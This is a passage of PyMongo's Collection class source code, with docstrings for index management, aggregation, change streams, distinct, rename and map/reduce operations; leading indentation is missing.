.. _$center: https://docs.mongodb.com/manual/reference/operator/query/center/#op._S_center
.. _$centerSphere: https://docs.mongodb.com/manual/reference/operator/query/centerSphere/#op._S_centerSphere
"""
warnings.warn("count is deprecated. Use estimated_document_count or "
"count_documents instead. Please note that $where must "
"be replaced by $expr, $near must be replaced by "
"$geoWithin with $center, and $nearSphere must be "
"replaced by $geoWithin with $centerSphere",
DeprecationWarning, stacklevel=2)
cmd = SON([("count", self.__name)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
if "hint" in kwargs and not isinstance(kwargs["hint"], string_type):
kwargs["hint"] = helpers._index_document(kwargs["hint"])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
return self._count(cmd, collation, session)
def create_indexes(self, indexes, session=None, **kwargs):
"""Create one or more indexes on this collection.
>>> from pymongo import IndexModel, ASCENDING, DESCENDING
>>> index1 = IndexModel([("hello", DESCENDING),
... ("world", ASCENDING)], name="hello_world")
>>> index2 = IndexModel([("goodbye", DESCENDING)])
>>> db.test.create_indexes([index1, index2])
["hello_world", "goodbye_-1"]
:Parameters:
- `indexes`: A list of :class:`~pymongo.operations.IndexModel`
instances.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the createIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: `create_indexes` uses the `createIndexes`_ command
introduced in MongoDB **2.6** and cannot be used with earlier
versions.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. versionadded:: 3.0
.. _createIndexes: https://docs.mongodb.com/manual/reference/command/createIndexes/
"""
common.validate_list('indexes', indexes)
names = []
with self._socket_for_writes() as sock_info:
supports_collations = sock_info.max_wire_version >= 5
def gen_indexes():
for index in indexes:
if not isinstance(index, IndexModel):
raise TypeError(
"%r is not an instance of "
"pymongo.operations.IndexModel" % (index,))
document = index.document
if "collation" in document and not supports_collations:
raise ConfigurationError(
"Must be connected to MongoDB "
"3.4+ to use collations.")
names.append(document["name"])
yield document
cmd = SON([('createIndexes', self.name),
('indexes', list(gen_indexes()))])
cmd.update(kwargs)
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
codec_options=_UNICODE_REPLACE_CODEC_OPTIONS,
write_concern=self._write_concern_for(session),
session=session)
return names
def __create_index(self, keys, index_options, session, **kwargs):
"""Internal create index helper.
:Parameters:
- `keys`: a list of tuples [(key, type), (key, type), ...]
- `index_options`: a dict of index options.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
"""
index_doc = helpers._index_document(keys)
index = {"key": index_doc}
collation = validate_collation_or_none(
index_options.pop('collation', None))
index.update(index_options)
with self._socket_for_writes() as sock_info:
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
else:
index['collation'] = collation
cmd = SON([('createIndexes', self.name), ('indexes', [index])])
cmd.update(kwargs)
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
codec_options=_UNICODE_REPLACE_CODEC_OPTIONS,
write_concern=self._write_concern_for(session),
session=session)
def create_index(self, keys, session=None, **kwargs):
"""Creates an index on this collection.
Takes either a single key or a list of (key, direction) pairs.
The key(s) must be an instance of :class:`basestring`
(:class:`str` in python 3), and the direction(s) must be one of
(:data:`~pymongo.ASCENDING`, :data:`~pymongo.DESCENDING`,
:data:`~pymongo.GEO2D`, :data:`~pymongo.GEOHAYSTACK`,
:data:`~pymongo.GEOSPHERE`, :data:`~pymongo.HASHED`,
:data:`~pymongo.TEXT`).
To create a single key ascending index on the key ``'mike'`` we just
use a string argument::
>>> my_collection.create_index("mike")
For a compound index on ``'mike'`` descending and ``'eliot'``
ascending we need to use a list of tuples::
>>> my_collection.create_index([("mike", pymongo.DESCENDING),
... ("eliot", pymongo.ASCENDING)])
All optional index creation parameters should be passed as
keyword arguments to this method. For example::
>>> my_collection.create_index([("mike", pymongo.DESCENDING)],
... background=True)
Valid options include, but are not limited to:
- `name`: custom name to use for this index - if none is
given, a name will be generated.
- `unique`: if ``True`` creates a uniqueness constraint on the index.
- `background`: if ``True`` this index should be created in the
background.
- `sparse`: if ``True``, omit from the index any documents that lack
the indexed field.
- `bucketSize`: for use with geoHaystack indexes.
Number of documents to group together within a certain proximity
to a given longitude and latitude.
- `min`: minimum value for keys in a :data:`~pymongo.GEO2D`
index.
- `max`: maximum value for keys in a :data:`~pymongo.GEO2D`
index.
- `expireAfterSeconds`: <int> Used to create an expiring (TTL)
collection. MongoDB will automatically delete documents from
this collection after <int> seconds. The indexed field must
be a UTC datetime or the data will not expire.
- `partialFilterExpression`: A document that specifies a filter for
a partial index.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
See the MongoDB documentation for a full list of supported options by
server version.
.. warning:: `dropDups` is not supported by MongoDB 3.0 or newer. The
option is silently ignored by the server and unique index builds
using the option will fail if a duplicate value is detected.
.. note:: `partialFilterExpression` requires server version **>= 3.2**
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
:Parameters:
- `keys`: a single key or a list of (key, direction)
pairs specifying the index to create
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): any additional index creation
options (see the above list) should be passed as keyword
arguments
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for passing maxTimeMS
in kwargs.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4. Support the `collation` option.
.. versionchanged:: 3.2
Added partialFilterExpression to support partial indexes.
.. versionchanged:: 3.0
Renamed `key_or_list` to `keys`. Removed the `cache_for` option.
:meth:`create_index` no longer caches index names. Removed support
for the drop_dups and bucket_size aliases.
.. mongodoc:: indexes
"""
keys = helpers._index_list(keys)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
cmd_options = {}
if "maxTimeMS" in kwargs:
cmd_options["maxTimeMS"] = kwargs.pop("maxTimeMS")
self.__create_index(keys, kwargs, session, **cmd_options)
return name
def ensure_index(self, key_or_list, cache_for=300, **kwargs):
"""**DEPRECATED** - Ensures that an index exists on this collection.
.. versionchanged:: 3.0
**DEPRECATED**
"""
warnings.warn("ensure_index is deprecated. Use create_index instead.",
DeprecationWarning, stacklevel=2)
# The types supported by datetime.timedelta.
if not (isinstance(cache_for, integer_types) or
isinstance(cache_for, float)):
raise TypeError("cache_for must be an integer or float.")
if "drop_dups" in kwargs:
kwargs["dropDups"] = kwargs.pop("drop_dups")
if "bucket_size" in kwargs:
kwargs["bucketSize"] = kwargs.pop("bucket_size")
keys = helpers._index_list(key_or_list)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
# Note that there is a race condition here. One thread could
# check if the index is cached and be preempted before creating
# and caching the index. This means multiple threads attempting
# to create the same index concurrently could send the index
# to the server two or more times. This has no practical impact
# other than wasted round trips.
if not self.__database.client._cached(self.__database.name,
self.__name, name):
self.__create_index(keys, kwargs, session=None)
self.__database.client._cache_index(self.__database.name,
self.__name, name, cache_for)
return name
return None
def drop_indexes(self, session=None, **kwargs):
"""Drops all indexes on this collection.
Can be used on non-existent collections or collections with no indexes.
Raises OperationFailure on an error.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the dropIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
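A minimal illustrative call, bounding server execution time with the
optional ``maxTimeMS`` argument::
>>> db.test.drop_indexes(maxTimeMS=1000)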
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
self.__database.client._purge_index(self.__database.name, self.__name)
self.drop_index("*", session=session, **kwargs)
def drop_index(self, index_or_name, session=None, **kwargs):
"""Drops the specified index on this collection.
Can be used on non-existent collections or collections with no
indexes. Raises OperationFailure on an error (e.g. trying to
drop an index that does not exist). `index_or_name`
can be either an index name (as returned by `create_index`),
or an index specifier (as passed to `create_index`). An index
specifier should be a list of (key, direction) pairs. Raises
TypeError if index is not an instance of (str, unicode, list).
.. warning::
if a custom name was used on index creation (by
passing the `name` parameter to :meth:`create_index` or
:meth:`ensure_index`) the index **must** be dropped by name.
:Parameters:
- `index_or_name`: index (or name of index) to drop
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the dropIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
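For example, either of these illustrative calls drops the same
single-key descending index::
>>> db.test.drop_index("mike_-1")
>>> db.test.drop_index([("mike", pymongo.DESCENDING)])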
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
name = index_or_name
if isinstance(index_or_name, list):
name = helpers._gen_index_name(index_or_name)
if not isinstance(name, string_type):
raise TypeError("index_or_name must be an index name or list")
self.__database.client._purge_index(
self.__database.name, self.__name, name)
cmd = SON([("dropIndexes", self.__name), ("index", name)])
cmd.update(kwargs)
with self._socket_for_writes() as sock_info:
self._command(sock_info,
cmd,
read_preference=ReadPreference.PRIMARY,
allowable_errors=["ns not found"],
write_concern=self._write_concern_for(session),
session=session)
def reindex(self, session=None, **kwargs):
"""Rebuilds all indexes on this collection.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the reIndex
command (like maxTimeMS) can be passed as keyword arguments.
.. warning:: reindex blocks all other operations (indexes
are built in the foreground) and will be slow for large
collections.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.5
We no longer apply this collection's write concern to this operation.
MongoDB 3.4 silently ignored the write concern. MongoDB 3.6+ returns
an error if we include the write concern.
"""
cmd = SON([("reIndex", self.__name)])
cmd.update(kwargs)
with self._socket_for_writes() as sock_info:
return self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
session=session)
def list_indexes(self, session=None):
"""Get a cursor over the index documents for this collection.
>>> for index in db.test.list_indexes():
... print(index)
...
SON([(u'v', 1), (u'key', SON([(u'_id', 1)])),
(u'name', u'_id_'), (u'ns', u'test.test')])
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.command_cursor.CommandCursor`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionadded:: 3.0
"""
codec_options = CodecOptions(SON)
coll = self.with_options(codec_options=codec_options,
read_preference=ReadPreference.PRIMARY)
sock_ctx, read_pref = self._socket_for_primary_reads(session)
with sock_ctx as (sock_info, slave_ok):
cmd = SON([("listIndexes", self.__name), ("cursor", {})])
if sock_info.max_wire_version > 2:
with self.__database.client._tmp_session(session, False) as s:
try:
cursor = self._command(sock_info, cmd, slave_ok,
read_pref,
codec_options,
session=s)["cursor"]
except OperationFailure as exc:
# Ignore NamespaceNotFound errors to match the behavior
# of reading from *.system.indexes.
if exc.code != 26:
raise
cursor = {'id': 0, 'firstBatch': []}
return CommandCursor(coll, cursor, sock_info.address,
session=s,
explicit_session=session is not None)
else:
res = message._first_batch(
sock_info, self.__database.name, "system.indexes",
{"ns": self.__full_name}, 0, slave_ok, codec_options,
read_pref, cmd,
self.database.client._event_listeners)
cursor = res["cursor"]
# Note that a collection can only have 64 indexes, so there
# will never be a getMore call.
return CommandCursor(coll, cursor, sock_info.address)
def index_information(self, session=None):
"""Get information on this collection's indexes.
Returns a dictionary where the keys are index names (as
returned by create_index()) and the values are dictionaries
containing information about each index. The dictionary is
guaranteed to contain at least a single key, ``"key"`` which
is a list of (key, direction) pairs specifying the index (as
passed to create_index()). It will also contain any other
metadata about the indexes, except for the ``"ns"`` and
``"name"`` keys, which are cleaned. Example output might look
like this:
>>> db.test.create_index("x", unique=True)
u'x_1'
>>> db.test.index_information()
{u'_id_': {u'key': [(u'_id', 1)]},
u'x_1': {u'unique': True, u'key': [(u'x', 1)]}}
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
cursor = self.list_indexes(session=session)
info = {}
for index in cursor:
index["key"] = index["key"].items()
index = dict(index)
info[index.pop("name")] = index
return info
def options(self, session=None):
"""Get the options set on this collection.
Returns a dictionary of options and their values - see
:meth:`~pymongo.database.Database.create_collection` for more
information on the possible options. Returns an empty
dictionary if the collection has not been created yet.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
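An illustrative check for whether this collection was created as a
capped collection (the ``capped`` option may simply be absent)::
>>> db.test.options().get('capped', False)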
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
dbo = self.__database.client.get_database(
self.__database.name,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
cursor = dbo.list_collections(
session=session, filter={"name": self.__name})
result = None
for doc in cursor:
result = doc
break
if not result:
return {}
options = result.get("options", {})
if "create" in options:
del options["create"]
return options
def _aggregate(self, pipeline, cursor_class, first_batch_size, session,
explicit_session, **kwargs):
common.validate_list('pipeline', pipeline)
if "explain" in kwargs:
raise ConfigurationError("The explain option is not supported. "
"Use Database.command instead.")
collation = validate_collation_or_none(kwargs.pop('collation', None))
max_await_time_ms = kwargs.pop('maxAwaitTimeMS', None)
cmd = SON([("aggregate", self.__name),
("pipeline", pipeline)])
# Remove things that are not command options.
use_cursor = True
if "useCursor" in kwargs:
warnings.warn(
"The useCursor option is deprecated "
"and will be removed in PyMongo 4.0",
DeprecationWarning, stacklevel=2)
use_cursor = common.validate_boolean(
"useCursor", kwargs.pop("useCursor"))
batch_size = common.validate_non_negative_integer_or_none(
"batchSize", kwargs.pop("batchSize", None))
# If the server does not support the "cursor" option we
# ignore useCursor and batchSize.
with self._socket_for_reads(session) as (sock_info, slave_ok):
dollar_out = pipeline and '$out' in pipeline[-1]
if use_cursor:
if "cursor" not in kwargs:
kwargs["cursor"] = {}
# Ignore batchSize when the $out pipeline stage is used.
# batchSize is meaningless in that case since the server
# doesn't return results. This also avoids SERVER-23923.
if first_batch_size is not None and not dollar_out:
kwargs["cursor"]["batchSize"] = first_batch_size
cmd.update(kwargs)
# Apply this Collection's read concern if $out is not in the
# pipeline.
if (sock_info.max_wire_version >= 4
and 'readConcern' not in cmd
and not dollar_out):
read_concern = self.read_concern
else:
read_concern = None
if 'writeConcern' not in cmd and dollar_out:
write_concern = self._write_concern_for(session)
else:
write_concern = None
# Avoid auto-injecting a session: aggregate() passes a session,
# aggregate_raw_batches() passes none.
result = sock_info.command(
self.__database.name,
cmd,
slave_ok,
self._read_preference_for(session),
self.codec_options,
parse_write_concern_error=True,
read_concern=read_concern,
write_concern=write_concern,
collation=collation,
session=session,
client=self.__database.client)
if "cursor" in result:
cursor = result["cursor"]
else:
# Pre-MongoDB 2.6 or unacknowledged write. Fake a cursor.
cursor = {
"id": 0,
"firstBatch": result.get("result", []),
"ns": self.full_name,
}
return cursor_class(
self, cursor, sock_info.address,
batch_size=batch_size or 0,
max_await_time_ms=max_await_time_ms,
session=session, explicit_session=explicit_session)
def aggregate(self, pipeline, session=None, **kwargs):
"""Perform an aggregation using the aggregation framework on this
collection.
All optional `aggregate command`_ parameters should be passed as
keyword arguments to this method. Valid options include, but are not
limited to:
- `allowDiskUse` (bool): Enables writing to temporary files. When set
to True, aggregation stages can write data to the _tmp subdirectory
of the --dbpath directory. The default is False.
- `maxTimeMS` (int): The maximum amount of time to allow the operation
to run in milliseconds.
- `batchSize` (int): The maximum number of documents to return per
batch. Ignored if the connected mongod or mongos does not support
returning aggregate results using a cursor, or `useCursor` is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `useCursor` (bool): Deprecated. Will be removed in PyMongo 4.0.
The :meth:`aggregate` method obeys the :attr:`read_preference` of this
:class:`Collection`. Please note that using the ``$out`` pipeline stage
requires a read preference of
:attr:`~pymongo.read_preferences.ReadPreference.PRIMARY` (the default).
The server will raise an error if the ``$out`` pipeline stage is used
with any other read preference.
.. note:: This method does not support the 'explain' option. Please
use :meth:`~pymongo.database.Database.command` instead. An
example is included in the :ref:`aggregate-examples` documentation.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
:Parameters:
- `pipeline`: a list of aggregation pipeline stages
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
:Returns:
A :class:`~pymongo.command_cursor.CommandCursor` over the result
set.
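An illustrative pipeline (collection and field names are hypothetical)
that filters on ``status`` and sums ``qty`` per group::
>>> pipeline = [{'$match': {'status': 'A'}},
... {'$group': {'_id': '$status', 'total': {'$sum': '$qty'}}}]
>>> cursor = db.test.aggregate(pipeline, allowDiskUse=True)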
.. versionchanged:: 3.6
Added the `session` parameter. Added the `maxAwaitTimeMS` option.
Deprecated the `useCursor` option.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4. Support the `collation` option.
.. versionchanged:: 3.0
The :meth:`aggregate` method always returns a CommandCursor. The
pipeline argument must be a list.
.. versionchanged:: 2.7
When the cursor option is used, return
:class:`~pymongo.command_cursor.CommandCursor` instead of
:class:`~pymongo.cursor.Cursor`.
.. versionchanged:: 2.6
Added cursor support.
.. versionadded:: 2.3
.. seealso:: :doc:`/examples/aggregation`
.. _aggregate command:
https://docs.mongodb.com/manual/reference/command/aggregate
"""
with self.__database.client._tmp_session(session, close=False) as s:
return self._aggregate(pipeline,
CommandCursor,
kwargs.get('batchSize'),
session=s,
explicit_session=session is not None,
**kwargs)
def aggregate_raw_batches(self, pipeline, **kwargs):
"""Perform an aggregation and retrieve batches of raw BSON.
Similar to the :meth:`aggregate` method but returns a
:class:`~pymongo.cursor.RawBatchCursor`.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
>>> import bson
>>> cursor = db.test.aggregate_raw_batches([
... {'$project': {'x': {'$multiply': [2, '$x']}}}])
>>> for batch in cursor:
... print(bson.decode_all(batch))
.. note:: aggregate_raw_batches does not support sessions.
.. versionadded:: 3.6
"""
# OP_MSG with document stream returns is required to support
# sessions.
if "session" in kwargs:
raise ConfigurationError(
"aggregate_raw_batches does not support sessions")
return self._aggregate(pipeline, RawBatchCommandCursor, 0,
None, False, **kwargs)
def watch(self, pipeline=None, full_document='default', resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None):
"""Watch changes on this collection.
Performs an aggregation with an implicit initial ``$changeStream``
stage and returns a
:class:`~pymongo.change_stream.CollectionChangeStream` cursor which
iterates over changes on this collection.
Introduced in MongoDB 3.6.
.. code-block:: python
with db.collection.watch() as stream:
for change in stream:
print(change)
The :class:`~pymongo.change_stream.CollectionChangeStream` iterable
blocks until the next change document is returned or an error is
raised. If the
:meth:`~pymongo.change_stream.CollectionChangeStream.next` method
encounters a network error when retrieving a batch from the server,
it will automatically attempt to recreate the cursor such that no
change events are missed. Any error encountered during the resume
attempt indicates there may be an outage and will be raised.
.. code-block:: python
try:
with db.collection.watch(
[{'$match': {'operationType': 'insert'}}]) as stream:
for insert_change in stream:
print(insert_change)
except pymongo.errors.PyMongoError:
# The ChangeStream encountered an unrecoverable error or the
# resume attempt failed to recreate the cursor.
logging.error('...')
For a precise description of the resume process see the
`change streams specification`_.
.. note:: Using this helper method is preferred to directly calling
:meth:`~pymongo.collection.Collection.aggregate` with a
``$changeStream`` stage, for the purpose of supporting
resumability.
.. warning:: This Collection's :attr:`read_concern` must be
``ReadConcern("majority")`` in order to use the ``$changeStream``
stage.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument to pass as an option
to the ``$changeStream`` stage. Allowed values: 'default',
'updateLookup'. Defaults to 'default'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): The logical starting point for this
change stream.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `start_at_operation_time` (optional): If provided, the resulting
change stream will only return changes that occurred at or after
the specified :class:`~bson.timestamp.Timestamp`. Requires
MongoDB >= 4.0.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
A :class:`~pymongo.change_stream.CollectionChangeStream` cursor.
.. versionchanged:: 3.7
Added the ``start_at_operation_time`` parameter.
.. versionadded:: 3.6
.. mongodoc:: changeStreams
.. _change streams specification:
https://github.com/mongodb/specifications/blob/master/source/change-streams/change-streams.rst
"""
return CollectionChangeStream(
self, pipeline, full_document, resume_after, max_await_time_ms,
batch_size, collation, start_at_operation_time, session
)
def group(self, key, condition, initial, reduce, finalize=None, **kwargs):
"""Perform a query similar to an SQL *group by* operation.
**DEPRECATED** - The group command was deprecated in MongoDB 3.4. The
:meth:`~group` method is deprecated and will be removed in PyMongo 4.0.
Use :meth:`~aggregate` with the `$group` stage or :meth:`~map_reduce`
instead.
.. versionchanged:: 3.5
Deprecated the group method.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 2.2
Removed deprecated argument: command
"""
warnings.warn("The group method is deprecated and will be removed in "
"PyMongo 4.0. Use the aggregate method with the $group "
"stage or the map_reduce method instead.",
DeprecationWarning, stacklevel=2)
group = {}
if isinstance(key, string_type):
group["$keyf"] = Code(key)
elif key is not None:
group = {"key": helpers._fields_list_to_dict(key, "key")}
group["ns"] = self.__name
group["$reduce"] = Code(reduce)
group["cond"] = condition
group["initial"] = initial
if finalize is not None:
group["finalize"] = Code(finalize)
cmd = SON([("group", group)])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session=None) as (sock_info, slave_ok):
return self._command(sock_info, cmd, slave_ok,
collation=collation)["retval"]
def rename(self, new_name, session=None, **kwargs):
"""Rename this collection.
If operating in auth mode, client must be authorized as an
admin to perform this operation. Raises :class:`TypeError` if
`new_name` is not an instance of :class:`basestring`
(:class:`str` in python 3). Raises :class:`~pymongo.errors.InvalidName`
if `new_name` is not a valid collection name.
:Parameters:
- `new_name`: new name for this collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the rename command
may be passed as keyword arguments to this helper method
(i.e. ``dropTarget=True``)
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
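An illustrative rename that also drops any existing target collection
(both collection names are hypothetical)::
>>> db.old_name.rename("new_name", dropTarget=True)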
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
if not isinstance(new_name, string_type):
raise TypeError("new_name must be an "
"instance of %s" % (string_type.__name__,))
if not new_name or ".." in new_name:
raise InvalidName("collection names cannot be empty")
if new_name[0] == "." or new_name[-1] == ".":
raise InvalidName("collecion names must not start or end with '.'")
if "$" in new_name and not new_name.startswith("oplog.$main"):
raise InvalidName("collection names must not contain '$'")
new_name = "%s.%s" % (self.__database.name, new_name)
cmd = SON([("renameCollection", self.__full_name), ("to", new_name)])
cmd.update(kwargs)
write_concern = self._write_concern_for_cmd(cmd, session)
with self._socket_for_writes() as sock_info:
with self.__database.client._tmp_session(session) as s:
return sock_info.command(
'admin', cmd,
write_concern=write_concern,
parse_write_concern_error=True,
session=s, client=self.__database.client)
def distinct(self, key, filter=None, session=None, **kwargs):
"""Get a list of distinct values for `key` among all documents
in this collection.
Raises :class:`TypeError` if `key` is not an instance of
:class:`basestring` (:class:`str` in python 3).
All optional distinct parameters should be passed as keyword arguments
to this method. Valid options include:
- `maxTimeMS` (int): The maximum amount of time to allow the count
command to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
The :meth:`distinct` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `key`: name of the field for which we want to get the distinct
values
- `filter` (optional): A query document that specifies the documents
from which to retrieve the distinct values.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
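For example, to get the distinct values of a hypothetical field ``x``
among documents whose ``y`` field is positive::
>>> db.test.distinct("x", {"y": {"$gt": 0}})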
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
"""
if not isinstance(key, string_type):
raise TypeError("key must be an "
"instance of %s" % (string_type.__name__,))
cmd = SON([("distinct", self.__name),
("key", key)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
return self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern,
collation=collation, session=session)["values"]
def map_reduce(self, map, reduce, out, full_response=False, session=None,
**kwargs):
"""Perform a map/reduce operation on this collection.
If `full_response` is ``False`` (default) returns a
:class:`~pymongo.collection.Collection` instance containing
the results of the operation. Otherwise, returns the full
response from the server to the `map reduce command`_.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `out`: output collection name or `out object` (dict). See
the `map reduce command`_ documentation for available options.
Note: `out` options are order sensitive. :class:`~bson.son.SON`
can be used to specify multiple options.
e.g. SON([('replace', <collection name>), ('db', <database name>)])
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.map_reduce(map, reduce, "myresults", limit=2)
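A slightly fuller illustrative sketch, wrapping hypothetical map and
reduce functions in :class:`~bson.code.Code`::
>>> from bson.code import Code
>>> mapper = Code("function () { emit(this.x, 1); }")
>>> reducer = Code("function (key, values) { return Array.sum(values); }")
>>> result = db.test.map_reduce(mapper, reducer, "myresults")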
.. note:: The :meth:`map_reduce` method does **not** obey the
:attr:`read_preference` of this :class:`Collection`. To run
mapReduce on a secondary use the :meth:`inline_map_reduce` method
instead.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation (if the
output is not inline) when using MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. seealso:: :doc:`/examples/aggregation`
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 2.2
Removed deprecated arguments: merge_output and reduce_output
.. _map reduce command: http://docs.mongodb.org/manual/reference/command/mapReduce/
.. mongodoc:: mapreduce
"""
if not isinstance(out, (string_type, abc.Mapping)):
raise TypeError("'out' must be an instance of "
"%s or a mapping" % (string_type.__name__,))
cmd = SON([("mapreduce", self.__name),
("map", map),
("reduce", reduce),
("out", out)])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
inline = 'inline' in cmd['out']
sock_ctx, read_pref = self._socket_for_primary_reads(session)
with sock_ctx as (sock_info, slave_ok):
if (sock_info.max_wire_version >= 4 and 'readConcern' not in cmd and
inline):
read_concern = self.read_concern
else:
read_concern = None
if 'writeConcern' not in cmd and not inline:
write_concern = self._write_concern_for(session)
else:
write_concern = None
response = self._command(
sock_info, cmd, slave_ok, read_pref,
read_concern=read_concern,
write_concern=write_concern,
collation=collation, session=session)
if full_response or not response.get('result'):
return response
elif isinstance(response['result'], dict):
dbase = response['result']['db']
coll = response['result']['collection']
return self.__database.client[dbase][coll]
else:
return self.__database[response["result"]]
def inline_map_reduce(self, map, reduce, full_response=False, session=None,
**kwargs):
"""Perform an inline map/reduce operation on this collection.
Perform the map/reduce operation on the server in RAM. A result
collection is not created. The result set is returned as a list
of documents.
If `full_response` is ``False`` (default) returns the
result documents in a list. Otherwise, returns the full
response from the server to the `map reduce command`_.
The :meth:`inline_map_reduce` method obeys the :attr:`read_preference`
of this :class:`Collection`.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.inline_map_reduce(map, reduce, limit=2)
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
"""
cmd = SON([("mapreduce", self.__name),
("map", map),
("reduce", reduce),
("out", {"inline": 1})])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
